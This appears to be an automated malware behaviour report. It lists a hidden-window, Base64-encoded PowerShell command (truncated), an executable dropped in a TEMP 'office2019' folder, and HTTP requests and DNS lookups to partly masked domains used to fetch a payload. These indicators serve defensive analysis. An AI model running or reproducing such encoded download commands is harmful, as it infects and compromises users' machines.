Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADgAcQBkADEAZABmAD0AKAAnAFIAJwArACcAMAByAGoANQB6AF8AJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
Modifies file system
Creates the following files
- %TEMP%\office2019\yy5m4s.exe
Deletes the following files
- %TEMP%\office2019\yy5m4s.exe
Network activity
TCP
HTTP GET requests
- http://av###illigen.nl/vo/tUbJ/
- http://ar####dia.com.br/Blog/sVey/
- http://bh##.com.br/caurina/tE/
- http://ra####aoweb.com.br/ZxOf1E/
- http://ce####hurcan.com/revolution-addons/mRXi8NJ/
UDP
- DNS ASK ea##a.cn
- DNS ASK ad##.org.sa
- DNS ASK av###illigen.nl
- DNS ASK ar####dia.com.br
- DNS ASK bh##.com.br
- DNS ASK ra####aoweb.com.br
- DNS ASK ce####hurcan.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADgAcQBkADEAZABmAD0AKAAnAFIAJwArACcAMAByAGoANQB6AF8AJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (with hidden window)
